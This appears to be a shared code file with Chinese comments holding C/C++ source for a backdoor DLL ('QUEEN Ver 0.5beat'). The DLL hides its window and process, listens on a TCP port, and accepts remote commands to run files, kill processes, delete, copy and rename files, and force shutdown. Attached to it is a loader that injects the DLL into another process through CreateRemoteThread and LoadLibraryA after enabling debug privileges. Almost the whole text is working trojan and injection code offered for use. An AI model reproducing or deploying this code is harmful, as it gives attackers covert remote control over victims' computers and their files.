📄 dll守护进程.txt
字号:
OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);
file://LookupPrivilegevalue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
ExitWindowsEx(EWX_FORCE|EWX_POWEROFF,0);
}
}
file://---------------------------------------------------------------------------
// ChangeDir
// 改变当前目录
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
BOOL WINAPI ChangeDir(LPCTSTR szDir)
{
if(SetCurrentDirectory(szDir))
return TRUE;
else
return FALSE;
}
file://---------------------------------------------------------------------------
// GetCurPath
// 得到当前目录
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI GetCurPath()
{
TCHAR lpBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
GetCurrentDirectory(MAX_PATH,lpBuff);
wsprintf(szTemp,"CurrentDirect: %s\n\r",lpBuff);
send(NewSock,szTemp,lstrlen(szTemp),0);
}
file://---------------------------------------------------------------------------
// ExeCommand
// 执行命令
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID ExeCommand(LPSTR szCommand,HWND hWnd)
{
TCHAR szBuf[MAX_PATH];
TCHAR Param1[100];
TCHAR Param2[100];
double PidArray[5],pid;
int i;
if((lstrcmp(szCommand,"getinfo"))==0)
GetSysInfo();
else if((lstrcmp(szCommand,"gcpath"))==0)
GetCurPath();
else if((lstrcmp(szCommand,"enumps"))==0)
EnumProcess();
else if((lstrcmp(szCommand,"exitwin"))==0)
ExitWin();
else if((strncmp(szCommand,"killps",lstrlen("killps")))==0)
{
if(lstrlen(szCommand)<=lstrlen("killps")+2)
{
send(NewSock,"usage : killps PID",12,0);
}
for(i=lstrlen("killps")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)
break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("killps")+1);
int e=lstrlen(szCommand)-lstrlen("killps")-1;
for(int bit=0;bit<i-lstrlen("killps")-1;bit++)
{
PidArray[bit]=(DWORD)Param1[bit]-48;
pid+=PidArray[bit]*pow(10,--e);
}
if(KillPS(pid)==FALSE)
send(NewSock,"killps Fail",12,0);
else
send(NewSock,"killps OK",10,0);
}
}
else if((strncmp(szCommand,"execfile",lstrlen("execfile")))==0)
{
if(lstrlen(szCommand)<=lstrlen("execfile")+2)
{
send(NewSock,"usage : execfile szFileName",28,0);
}
for(i=lstrlen("execfile")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("execfile")+1);
if(LoadProcess(Param1)==FALSE)
send(NewSock,"execfile Fail",14,0);
else
send(NewSock,"execfile OK",11,0);
}
}
else if((strncmp(szCommand,"cd",lstrlen("cd")))==0)
{
if(lstrlen(szCommand)<=lstrlen("cd")+2)
{
send(NewSock,"cd Drive\\Directory",19,0);
}
for(i=lstrlen("cd")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("cd")+1);
if(ChangeDir(Param1)==FALSE)
send(NewSock,"Change Directory Fail",21,0);
else
send(NewSock,"Change Directory OK",19,0);
}
}
else if((strncmp(szCommand,"dir",lstrlen("dir")))==0)
{
if(lstrlen(szCommand)<=lstrlen("dir")+2)
{
Dir("*.*");
}
for(i=lstrlen("dir")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("dir")+1);
Dir(Param1);
}
}
else if((strncmp(szCommand,"del",lstrlen("del")))==0)
{
if(lstrlen(szCommand)<=lstrlen("del")+2)
{
send(NewSock,"usage : DEL szFileName",28,0);
}
for(i=lstrlen("del")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("del")+1);
Delete(Param1);
}
}
else if((strncmp(szCommand,"copy",lstrlen("copy")))==0)
{
if(lstrlen(szCommand)<=lstrlen("COPY")+2)
{
send(NewSock,"usage : COPY Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("copy")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("copy")+1);
lstrcpy(Param2,"");
send(NewSock,"Copy File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf[i]=‘0‘;
lstrcpy(Param1,szBuf+lstrlen("copy")+1);
lstrcpy(Param2,szBuf+i+1);
Copy(Param1,Param2);
}
}
else if((strncmp(szCommand,"ren",lstrlen("ren")))==0)
{
if(lstrlen(szCommand)<=lstrlen("ren")+2)
{
send(NewSock,"usage : REN Drive\\Filename ",28,0);
return;
}
for(i=lstrlen("ren")+1;i<lstrlen(szCommand);i++)
if(szCommand==‘\0‘)break;
if(i==lstrlen(szCommand))
{
lstrcpy(Param1,szCommand+lstrlen("ren")+1);
lstrcpy(Param2,"");
send(NewSock,"Ren File1 to File2",19,0);
}
else
{
lstrcpy(szBuf,szCommand);
szBuf[i]=‘0‘;
lstrcpy(Param1,szBuf+lstrlen("ren")+1);
lstrcpy(Param2,szBuf+i+1);
Ren(Param1,Param2);
}
}
else
send(NewSock,"Bad Command !!!",16,0);
}
file://---------------------------------------------------------------------------
// InitSocket
// 初始化SOCKET
file://--------------------------------------------------------------------------
extern "C" __declspec(dllexport)
BOOL WINAPI InitSocket(HWND hWnd)
{
if((WSAStartup(dwVersion,&wsaData))!=0)
{
MessageBox(hWnd,"INIT SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
CreateSock=socket(AF_INET,SOCK_STREAM,0);//用来创建一个套接字,成功返回新套接字的描述字
if(CreateSock==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"SOCKET ERROR",NULL,MB_OK);
return FALSE;
}
Sock_in.sin_family=AF_INET;
Sock_in.sin_port=htons(PORT);
Sock_in.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
setsockopt(CreateSock,SOL_SOCKET,SO_REUSEADDR,(LPSTR)&dwFlag,sizeof(dwFlag));
if(bind(CreateSock,(LPSOCKADDR)&Sock_in,sizeof(Sock_in))==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"BIND ERROR",NULL,MB_OK);
return FALSE;
}
else if(listen(CreateSock,3)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"LISTEN ERROR",NULL,MB_OK);
return FALSE;
}
else if(WSAAsyncSelect(CreateSock,hWnd,WM_SOCKET,FD_ACCEPT|FD_CLOSE)==SOCKET_ERROR)
{
closesocket(CreateSock);
MessageBox(hWnd,"WSASelect ERROR",NULL,MB_OK);
return FALSE;
}
addrlen=sizeof(SOCKADDR_IN);
return TRUE;
}
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
LRESULT CALLBACK WndProc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
static TCHAR szCommand[dwComm];
static TCHAR szExec[dwComm];
switch(message)
{
case WM_SOCKET:
if(WSAGETSELECTERROR(lParam))
{
closesocket(wParam);
break;
}
switch(WSAGETSELECTEVENT(lParam))
{
file://连接
case FD_ACCEPT:
NewSock=accept(CreateSock,(LPSOCKADDR)&NewSock_in,&addrlen);
WSAAsyncSelect(NewSock,hWnd,WM_SOCKET,FD_READ|FD_WRITE|FD_CLOSE);
wsprintf(szCommand,"QUEEN Ver 0.5beat Write by NOIR\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
break;
file://读取输入,如是回车则执行命令
file://不是将输入复制到缓冲区
case FD_READ:
ZeroMemory(szCommand,dwComm);
recv(NewSock,szCommand,dwComm,0);
if(szCommand[0]==VK_RETURN)
{
wsprintf(szCommand,"\n\n\r%s",PROMPT);
send(NewSock,szCommand,dwComm,0);
ExeCommand(szExec,hWnd);
ZeroMemory(szExec,dwComm);
}
else
lstrcat(szExec,szCommand);
send(NewSock,szCommand,dwComm,0);
break;
case FD_CLOSE:
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
HideProc(UNSERVICE_PROC);
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
file://---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
WINAPI WinMain(HINSTANCE , HINSTANCE, LPSTR, int)
{
HWND hWnd;
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="QUEEN";
HKEY hKey=0;
DWORD disp=0;
LONG lResult;
TCHAR szKey[MAX_PATH];
TCHAR szSysDir[MAX_PATH+25];
TCHAR szFileName[MAX_PATH];
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"QUEENServer",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
if(GetOS()==VER_PLATFORM_WIN32_WINDOWS)
{
HideProc(SERVICE_PROC);
}
InitSocket(hWnd);
file://复制文件到系统目录
file://并加载注册表,自动运行
while(GetMessage(&msg,NULL,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (msg.wParam);
}
file://---------------------------------------------------------------------------------
DWORD WINAPI start(LPVOID not)
{
HANDLE hinst=GetCurrentProcess();//或用HMODULE GetModuleHandle()
LPSTR lpCmdLine=GetCommandLine();
WinMain(hinst,//当前的实例句柄
NULL,//总为NULL
lpCmdLine,//命令行参数,由GetCommandLine()得到
SW_SHOW);//窗口显示方式
}
file://---------------------------------------------------------------------------------
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved)
{ char *szprocessid=new char[10];
DWORD hthreadid;
HANDLE hthread;
switch(fwdreason)
{
case DLL_PROCESS_ATTACH:
hthread=CreateThread(NULL,0,start,(LPVOID)1,0,&hthreadid);
break;
default:
break;
}
return(TRUE);
return 1;
}
file://---------------------------------------------------------------------------
file://--------------------------------------------------------------------------------------------------
然后是加载DLL的代码:
#pragma hdrstop
#include <windows.h>
#include <stdio.h>
file://---------------------------------------------------------------------------
#pragma argsused
void EnableDebugPriv();//提升应用级调试权限,此处为EnableDebugPriv()函数的声明
file://---------------------------------------------------------------------------------------
int main(int argc, char* argv[])
{
int pid;
char *pszLibFileName="test.dll";//把DLL拷到SYSTEM32目录下
printf("please enter the inject pid:\n");
scanf("%d",&pid);
HANDLE hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pid);
int cb = (1 + lstrlenA(pszLibFileName)) * sizeof(char);
char *pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
return 0;
}
file://----------------------------------------------------------------------------------------
file://提升权限
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnamevalue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),//返回当前进程的伪句柄
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,//要求改变访问信令中指定的权限
file://要求查寻访问信令的内容
&hToken ) )//当函数返回时,该参数标识新打开的访问信令
return;
if ( ! LookupPrivilegeValue( NULL,//函数试图查找局部系统上的权限名称
SE_DEBUG_NAME,//要求调试一个进程的权限
&sedebugnamevalue ) )
{
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnamevalue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;//允许权限
if ( ! AdjustTokenPrivileges( hToken,//标识访问信令
FALSE,//为FALSE,则根剧tkp指像的信息修改权限
&tkp,
sizeof tkp,
NULL,
NULL ) )
CloseHandle( hToken );
}
file://---------------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -